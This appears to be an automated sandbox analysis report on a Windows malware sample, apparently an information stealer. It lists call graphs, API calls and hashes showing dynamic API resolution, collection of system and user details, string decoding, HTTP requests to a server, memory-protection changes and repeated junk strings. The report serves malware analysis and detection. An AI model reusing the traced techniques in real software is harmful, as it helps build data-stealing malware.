c9ab30 lstrlen lstrcpy 38841->38872 38844 c9ab30 2 API calls 38842->38844 38843 c95aa6 StrCmpCA 38845 c95be1 38843->38845 38843->38872 38847 
c95a55 38844->38847 38846 c9abb0 lstrcpy 38845->38846 38848 c95bed 38846->38848 38849 c816b0 lstrcpy 38847->38849 38851 c9ab30 2 API calls 38848->38851 38871 c95a61 38849->38871 38850 c81590 lstrcpy 38850->38872 38852 c95bfb 38851->38852 38855 c9ab30 2 API calls 38852->38855 38853 c95c5b StrCmpCA 38856 c95c78 38853->38856 38857 c95c66 Sleep 38853->38857 38854 c95510 25 API calls 38854->38872 38858 c95c0a 38855->38858 38859 c9abb0 lstrcpy 38856->38859 38857->38872 38861 c816b0 lstrcpy 38858->38861 38862 c95c84 38859->38862 38860 c9abb0 lstrcpy 38860->38872 38861->38871 38863 c9ab30 2 API calls 38862->38863 38865 c95c93 38863->38865 38864 c95440 20 API calls 38864->38872 38866 c9ab30 2 API calls 38865->38866 38868 c95ca2 38866->38868 38867 c959da StrCmpCA 38867->38872 38869 c816b0 lstrcpy 38868->38869 38869->38871 38870 c95b8f StrCmpCA 38870->38872 38871->37925 38872->38833 38872->38834 38872->38835 38872->38836 38872->38841 38872->38843 38872->38850 38872->38853 38872->38854 38872->38860 38872->38864 38872->38867 38872->38870 38874 c976dc 38873->38874 38875 c976e3 GetVolumeInformationA 38873->38875 38874->38875 38879 c97721 38875->38879 38876 c9778c GetProcessHeap RtlAllocateHeap 38877 c977a9 38876->38877 38878 c977b8 wsprintfA 38876->38878 38880 c9aa50 lstrcpy 38877->38880 38881 c9aa50 lstrcpy 38878->38881 38879->38876 38882 c95ff7 38880->38882 38881->38882 38882->37946 38884 c9aab0 lstrcpy 38883->38884 38885 c848e9 38884->38885 39086 c84800 38885->39086 38887 c848f5 38888 c9aa50 lstrcpy 38887->38888 38889 c84927 38888->38889 38890 c9aa50 lstrcpy 38889->38890 38891 c84934 38890->38891 38892 c9aa50 lstrcpy 38891->38892 38893 c84941 38892->38893 38894 c9aa50 lstrcpy 38893->38894 38895 c8494e 38894->38895 38896 c9aa50 lstrcpy 38895->38896 38897 c8495b InternetOpenA StrCmpCA 38896->38897 38898 c84994 38897->38898 38899 c84f1b InternetCloseHandle 38898->38899 39092 c98cf0 38898->39092 38901 c84f38 38899->38901 39107 c8a210 CryptStringToBinaryA 38901->39107 38902 c849b3 
39100 c9ac30 38902->39100 38905 c849c6 38907 c9abb0 lstrcpy 38905->38907 38912 c849cf 38907->38912 38908 c9ab30 2 API calls 38909 c84f55 38908->38909 38910 c9acc0 4 API calls 38909->38910 38913 c84f6b 38910->38913 38911 c84f77 ctype 38915 c9aab0 lstrcpy 38911->38915 38916 c9acc0 4 API calls 38912->38916 38914 c9abb0 lstrcpy 38913->38914 38914->38911 38928 c84fa7 38915->38928 38917 c849f9 38916->38917 38918 c9abb0 lstrcpy 38917->38918 38919 c84a02 38918->38919 38920 c9acc0 4 API calls 38919->38920 38921 c84a21 38920->38921 38922 c9abb0 lstrcpy 38921->38922 38923 c84a2a 38922->38923 38924 c9ac30 3 API calls 38923->38924 38925 c84a48 38924->38925 38926 c9abb0 lstrcpy 38925->38926 38927 c84a51 38926->38927 38929 c9acc0 4 API calls 38927->38929 38928->37949 38930 c84a70 38929->38930 38931 c9abb0 lstrcpy 38930->38931 38932 c84a79 38931->38932 38933 c9acc0 4 API calls 38932->38933 38934 c84a98 38933->38934 38935 c9abb0 lstrcpy 38934->38935 38936 c84aa1 38935->38936 38937 c9acc0 4 API calls 38936->38937 38938 c84acd 38937->38938 38939 c9ac30 3 API calls 38938->38939 38940 c84ad4 38939->38940 38941 c9abb0 lstrcpy 38940->38941 38942 c84add 38941->38942 38943 c84af3 InternetConnectA 38942->38943 38943->38899 38944 c84b23 HttpOpenRequestA 38943->38944 38946 c84b78 38944->38946 38947 c84f0e InternetCloseHandle 38944->38947 38948 c9acc0 4 API calls 38946->38948 38947->38899 38949 c84b8c 38948->38949 38950 c9abb0 lstrcpy 38949->38950 38951 c84b95 38950->38951 38952 c9ac30 3 API calls 38951->38952 38953 c84bb3 38952->38953 38954 c9abb0 lstrcpy 38953->38954 38955 c84bbc 38954->38955 38956 c9acc0 4 API calls 38955->38956 38957 c84bdb 38956->38957 38958 c9abb0 lstrcpy 38957->38958 38959 c84be4 38958->38959 38960 c9acc0 4 API calls 38959->38960 38961 c84c05 38960->38961 38962 c9abb0 lstrcpy 38961->38962 38963 c84c0e 38962->38963 38964 c9acc0 4 API calls 38963->38964 38965 c84c2e 38964->38965 38966 c9abb0 lstrcpy 38965->38966 38967 c84c37 38966->38967 38968 c9acc0 4 API calls 
38967->38968 38969 c84c56 38968->38969 38970 c9abb0 lstrcpy 38969->38970 38971 c84c5f 38970->38971 38972 c9ac30 3 API calls 38971->38972 38973 c84c7d 38972->38973 38974 c9abb0 lstrcpy 38973->38974 38975 c84c86 38974->38975 38976 c9acc0 4 API calls 38975->38976 38977 c84ca5 38976->38977 38978 c9abb0 lstrcpy 38977->38978 38979 c84cae 38978->38979 38980 c9acc0 4 API calls 38979->38980 38981 c84ccd 38980->38981 38982 c9abb0 lstrcpy 38981->38982 38983 c84cd6 38982->38983 38984 c9ac30 3 API calls 38983->38984 38985 c84cf4 38984->38985 38986 c9abb0 lstrcpy 38985->38986 38987 c84cfd 38986->38987 38988 c9acc0 4 API calls 38987->38988 38989 c84d1c 38988->38989 38990 c9abb0 lstrcpy 38989->38990 38991 c84d25 38990->38991 38992 c9acc0 4 API calls 38991->38992 38993 c84d46 38992->38993 38994 c9abb0 lstrcpy 38993->38994 38995 c84d4f 38994->38995 38996 c9acc0 4 API calls 38995->38996 38997 c84d6f 38996->38997 38998 c9abb0 lstrcpy 38997->38998 38999 c84d78 38998->38999 39000 c9acc0 4 API calls 38999->39000 39001 c84d97 39000->39001 39002 c9abb0 lstrcpy 39001->39002 39003 c84da0 39002->39003 39004 c9ac30 3 API calls 39003->39004 39005 c84dbe 39004->39005 39006 c9abb0 lstrcpy 39005->39006 39007 c84dc7 39006->39007 39008 c9aa50 lstrcpy 39007->39008 39009 c84de2 39008->39009 39010 c9ac30 3 API calls 39009->39010 39011 c84e03 39010->39011 39012 c9ac30 3 API calls 39011->39012 39013 c84e0a 39012->39013 39014 c9abb0 lstrcpy 39013->39014 39015 c84e16 39014->39015 39016 c84e37 lstrlen 39015->39016 39017 c84e4a 39016->39017 39018 c84e53 lstrlen 39017->39018 39106 c9ade0 39018->39106 39020 c84e63 HttpSendRequestA 39021 c84e82 InternetReadFile 39020->39021 39022 c84eb7 InternetCloseHandle 39021->39022 39027 c84eae 39021->39027 39025 c9ab10 39022->39025 39024 c9acc0 4 API calls 39024->39027 39025->38947 39026 c9abb0 lstrcpy 39026->39027 39027->39021 39027->39022 39027->39024 39027->39026 39113 c9ade0 39028->39113 39030 c91a14 StrCmpCA 39031 c91a1f ExitProcess 39030->39031 39032 c91a27 
39030->39032 39033 c91c12 39032->39033 39034 c91aad StrCmpCA 39032->39034 39035 c91acf StrCmpCA 39032->39035 39036 c91b41 StrCmpCA 39032->39036 39037 c91ba1 StrCmpCA 39032->39037 39038 c91bc0 StrCmpCA 39032->39038 39039 c91b63 StrCmpCA 39032->39039 39040 c91b82 StrCmpCA 39032->39040 39041 c91afd StrCmpCA 39032->39041 39042 c91b1f StrCmpCA 39032->39042 39043 c9ab30 lstrlen lstrcpy 39032->39043 39033->37951 39034->39032 39035->39032 39036->39032 39037->39032 39038->39032 39039->39032 39040->39032 39041->39032 39042->39032 39043->39032 39044->37957 39045->37959 39046->37965 39047->37967 39048->37973 39049->37975 39050->37979 39051->37983 39052->37987 39053->37993 39054->37995 39055->37999 39056->38013 39057->38017 39058->38016 39059->38012 39060->38016 39061->38034 39062->38019 39063->38023 39064->38025 39065->38030 39066->38031 39067->38037 39068->38044 39069->38046 39070->38070 39071->38073 39072->38074 39073->38069 39074->38074 39075->38083 39078 c9aab0 lstrcpy 39077->39078 39079 c816c3 39078->39079 39080 c9aab0 lstrcpy 39079->39080 39081 c816d5 39080->39081 39082 c9aab0 lstrcpy 39081->39082 39083 c816e7 39082->39083 39084 c9aab0 lstrcpy 39083->39084 39085 c815a3 39084->39085 39085->38810 39087 c84816 39086->39087 39088 c84888 lstrlen 39087->39088 39112 c9ade0 39088->39112 39090 c84898 InternetCrackUrlA 39091 c848b7 39090->39091 39091->38887 39093 c9aa50 lstrcpy 39092->39093 39094 c98d04 39093->39094 39095 c9aa50 lstrcpy 39094->39095 39096 c98d12 GetSystemTime 39095->39096 39097 c98d29 39096->39097 39098 c9aab0 lstrcpy 39097->39098 39099 c98d8c 39098->39099 39099->38902 39101 c9ac41 39100->39101 39102 c9ac98 39101->39102 39104 c9ac78 lstrcpy lstrcat 39101->39104 39103 c9aab0 lstrcpy 39102->39103 39105 c9aca4 39103->39105 39104->39102 39105->38905 39106->39020 39108 c8a249 LocalAlloc 39107->39108 39109 c84f3e 39107->39109 39108->39109 39110 c8a264 CryptStringToBinaryA 39108->39110 39109->38908 39109->38911 39110->39109 39111 c8a289 LocalFree 39110->39111 
39111->39109 39112->39090 39113->39030

                                    Control-flow Graph

                                    control_flow_graph 660 c99bb0-c99bc4 call c99aa0 663 c99bca-c99dde call c99ad0 GetProcAddress * 21 660->663 664 c99de3-c99e42 LoadLibraryA * 5 660->664 663->664 666 c99e5d-c99e64 664->666 667 c99e44-c99e58 GetProcAddress 664->667 669 c99e96-c99e9d 666->669 670 c99e66-c99e91 GetProcAddress * 2 666->670 667->666 671 c99eb8-c99ebf 669->671 672 c99e9f-c99eb3 GetProcAddress 669->672 670->669 673 c99ed9-c99ee0 671->673 674 c99ec1-c99ed4 GetProcAddress 671->674 672->671 675 c99f11-c99f12 673->675 676 c99ee2-c99f0c GetProcAddress * 2 673->676 674->673 676->675
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,01520600), ref: 00C99BF1
                                    • GetProcAddress.KERNEL32(75900000,015207C8), ref: 00C99C0A
                                    • GetProcAddress.KERNEL32(75900000,015206F0), ref: 00C99C22
                                    • GetProcAddress.KERNEL32(75900000,01520618), ref: 00C99C3A
                                    • GetProcAddress.KERNEL32(75900000,015207F8), ref: 00C99C53
                                    • GetProcAddress.KERNEL32(75900000,01528BB0), ref: 00C99C6B
                                    • GetProcAddress.KERNEL32(75900000,01516400), ref: 00C99C83
                                    • GetProcAddress.KERNEL32(75900000,01516440), ref: 00C99C9C
                                    • GetProcAddress.KERNEL32(75900000,01520810), ref: 00C99CB4
                                    • GetProcAddress.KERNEL32(75900000,01520678), ref: 00C99CCC
                                    • GetProcAddress.KERNEL32(75900000,015206A8), ref: 00C99CE5
                                    • GetProcAddress.KERNEL32(75900000,01520828), ref: 00C99CFD
                                    • GetProcAddress.KERNEL32(75900000,015162A0), ref: 00C99D15
                                    • GetProcAddress.KERNEL32(75900000,01520840), ref: 00C99D2E
                                    • GetProcAddress.KERNEL32(75900000,015206C0), ref: 00C99D46
                                    • GetProcAddress.KERNEL32(75900000,01516420), ref: 00C99D5E
                                    • GetProcAddress.KERNEL32(75900000,015206D8), ref: 00C99D77
                                    • GetProcAddress.KERNEL32(75900000,015208D0), ref: 00C99D8F
                                    • GetProcAddress.KERNEL32(75900000,01516640), ref: 00C99DA7
                                    • GetProcAddress.KERNEL32(75900000,01520900), ref: 00C99DC0
                                    • GetProcAddress.KERNEL32(75900000,01516300), ref: 00C99DD8
                                    • LoadLibraryA.KERNEL32(01520918,?,00C96CA0), ref: 00C99DEA
                                    • LoadLibraryA.KERNEL32(015208E8,?,00C96CA0), ref: 00C99DFB
                                    • LoadLibraryA.KERNEL32(015208A0,?,00C96CA0), ref: 00C99E0D
                                    • LoadLibraryA.KERNEL32(01520858,?,00C96CA0), ref: 00C99E1F
                                    • LoadLibraryA.KERNEL32(01520870,?,00C96CA0), ref: 00C99E30
                                    • GetProcAddress.KERNEL32(75070000,01520888), ref: 00C99E52
                                    • GetProcAddress.KERNEL32(75FD0000,015208B8), ref: 00C99E73
                                    • GetProcAddress.KERNEL32(75FD0000,01528E20), ref: 00C99E8B
                                    • GetProcAddress.KERNEL32(75A50000,01528C10), ref: 00C99EAD
                                    • GetProcAddress.KERNEL32(74E50000,01516520), ref: 00C99ECE
                                    • GetProcAddress.KERNEL32(76E80000,01528B40), ref: 00C99EEF
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00C99F06
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00C99EFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: c1bacf335adb65764304bd90b5dd7f36d40a79582c25e8fac50bb3adfb4e0f78
                                    • Instruction ID: ad2da89b77933a1d8ae0255914d0a4efb2a8f7f60b783d619082f3713a5aa475
                                    • Opcode Fuzzy Hash: c1bacf335adb65764304bd90b5dd7f36d40a79582c25e8fac50bb3adfb4e0f78
                                    • Instruction Fuzzy Hash: B9A13EB5518708AFC384EFA8FC889567BB9A74D303B50861ABB19C3671D734A941FF60

                                    Control-flow Graph

                                    control_flow_graph 764 c84610-c846e5 RtlAllocateHeap 781 c846f0-c846f6 764->781 782 c846fc-c8479a 781->782 783 c8479f-c847f9 VirtualProtect 781->783 782->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C8465F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C847EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84667, 00C84617, 00C8467D, 00C84728, 00C847CB, 00C8479F, 00C846B2, 00C846A7, 00C84707, 00C84693, 00C84763, 00C84672, 00C84688, 00C84643, 00C84622, 00C846BD, 00C847B5, 00C8476E, 00C846D3, 00C846FC, 00C8471D, 00C847AA, 00C847C0, 00C84784, 00C84712, 00C8478F, 00C8462D, 00C84779, 00C84638, 00C846C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 4eccec2a160741fe6c1628c04b2ee7b709a9e2e10987c9057be3fc935ddfda48
                                    • Instruction ID: ec5f730de2abb4036f1bf26b55308422204d9c1a8404ff3c57180740e7bc092d
                                    • Opcode Fuzzy Hash: 4eccec2a160741fe6c1628c04b2ee7b709a9e2e10987c9057be3fc935ddfda48
                                    • Instruction Fuzzy Hash: 364103607D2615FFC62CF7EE88CEEDD7662DFC770AF40985AAA0A522C3C6B055004725

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 c862d0-c8635b call c9aab0 call c84800 call c9aa50 InternetOpenA StrCmpCA 1040 c8635d 1033->1040 1041 c86364-c86368 1033->1041 1040->1041 1042 c86559-c86575 call c9aab0 call c9ab10 * 2 1041->1042 1043 c8636e-c86392 InternetConnectA 1041->1043 1061 c86578-c8657d 1042->1061 1044 c86398-c8639c 1043->1044 1045 c8654f-c86553 InternetCloseHandle 1043->1045 1047 c863aa 1044->1047 1048 c8639e-c863a8 1044->1048 1045->1042 1050 c863b4-c863e2 HttpOpenRequestA 1047->1050 1048->1050 1052 c863e8-c863ec 1050->1052 1053 c86545-c86549 InternetCloseHandle 1050->1053 1055 c863ee-c8640f InternetSetOptionA 1052->1055 1056 c86415-c86455 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1059 c8647c-c8649b call c98ad0 1056->1059 1060 c86457-c86477 call c9aa50 call c9ab10 * 2 1056->1060 1066 c86519-c86539 call c9aa50 call c9ab10 * 2 1059->1066 1067 c8649d-c864a4 1059->1067 1060->1061 1066->1061 1070 c864a6-c864d0 InternetReadFile 1067->1070 1071 c86517-c8653f InternetCloseHandle 1067->1071 1075 c864db 1070->1075 1076 c864d2-c864d9 1070->1076 1071->1053 1075->1071 1076->1075 1080 c864dd-c86515 call c9acc0 call c9abb0 call c9ab10 1076->1080 1080->1070
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C84800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C84889
                                      • Part of subcall function 00C84800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C84899
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • InternetOpenA.WININET(00CA0DFF,00000001,00000000,00000000,00000000), ref: 00C86331
                                    • StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C86353
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C86385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,0152DA28,00000000,00000000,00400100,00000000), ref: 00C863D5
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C8640F
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C86421
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C8644D
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C864BD
                                    • InternetCloseHandle.WININET(00000000), ref: 00C8653F
                                    • InternetCloseHandle.WININET(00000000), ref: 00C86549
                                    • InternetCloseHandle.WININET(00000000), ref: 00C86553
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: d29e81c6b70504a4d95a243679b32b72a2986bb177df775e275fcd0821a7eabe
                                    • Instruction ID: 68f06181619d11ec3686ea44baa216d79e69c398e0127cf060c4702985d53bd5
                                    • Opcode Fuzzy Hash: d29e81c6b70504a4d95a243679b32b72a2986bb177df775e275fcd0821a7eabe
                                    • Instruction Fuzzy Hash: 5E716F71A00318ABDF14EFA0DC59FEE7779AB44705F108198F60A6B190DBB06B84DF95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 c97690-c976da GetWindowsDirectoryA 1357 c976dc 1356->1357 1358 c976e3-c97757 GetVolumeInformationA call c98e90 * 3 1356->1358 1357->1358 1365 c97768-c9776f 1358->1365 1366 c9778c-c977a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 c97771-c9778a call c98e90 1365->1367 1369 c977a9-c977b6 call c9aa50 1366->1369 1370 c977b8-c977e8 wsprintfA call c9aa50 1366->1370 1367->1365 1377 c9780e-c9781e 1369->1377 1370->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C976D2
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C9770F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97793
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C9779A
                                    • wsprintfA.USER32 ref: 00C977D0
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 1b7c21286ecb24b2676c457172191cd8fe8eacf7729b27af10cc0242968530e0
                                    • Instruction ID: ac26d84c51a85a0fe20628309b7cc48d8dfc39b3bc32203e245bfaf57f2104eb
                                    • Opcode Fuzzy Hash: 1b7c21286ecb24b2676c457172191cd8fe8eacf7729b27af10cc0242968530e0
                                    • Instruction Fuzzy Hash: 984191B1D04348ABDF10DB94DC89BDEBBB8AF08704F100199F609AB280D775AA44DBA5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C811B7), ref: 00C97A10
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C97A17
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C97A2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: dfd708302f10f9d5cf549c4757222bf947136371884c9afc5deba2bddd7e337f
                                    • Instruction ID: 2224b5aece6726ef9d7e396180f8258405002999add9a2fde6b09e92e82aa93d
                                    • Opcode Fuzzy Hash: dfd708302f10f9d5cf549c4757222bf947136371884c9afc5deba2bddd7e337f
                                    • Instruction Fuzzy Hash: B2F04FB1948309EBCB00DF99DD49BAEBBB8EB05711F10021AF615A2680C77559008BA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 2a9904b9a595079b4cbefd41d43953ded28158f2921352b5eef65ca9d2d65486
                                    • Instruction ID: c853727136f6cf27dbd05d303fd6ece9ef3dc5c9878e000d78341c11d12d86cf
                                    • Opcode Fuzzy Hash: 2a9904b9a595079b4cbefd41d43953ded28158f2921352b5eef65ca9d2d65486
                                    • Instruction Fuzzy Hash: 67D09E7490431C9BCB04EFE0A9896DDBB78BB08616F140555DE0562340EA315496CBA5

                                    Control-flow Graph
